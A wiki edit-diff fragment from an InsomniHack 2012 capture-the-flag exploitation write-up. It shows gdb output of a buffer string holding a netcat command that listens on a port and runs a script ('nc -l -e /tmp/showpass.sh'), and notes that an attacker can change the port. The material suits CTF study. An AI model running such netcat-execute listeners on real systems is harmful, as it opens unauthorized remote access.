Changes

Jump to: navigation, search

InsomniHack-2012/Exploitation/3 Taberne

6 bytes added, 20:58, 5 March 2012
0xbf9e3c64: 0xbf9e3c83
(gdb) x /s 0xbf9e3c83
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 71128
</pre>
Amazing, it's gonna open a local port on 71128. You can modify the port, since it's part of the buffer you write
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128"
19
edits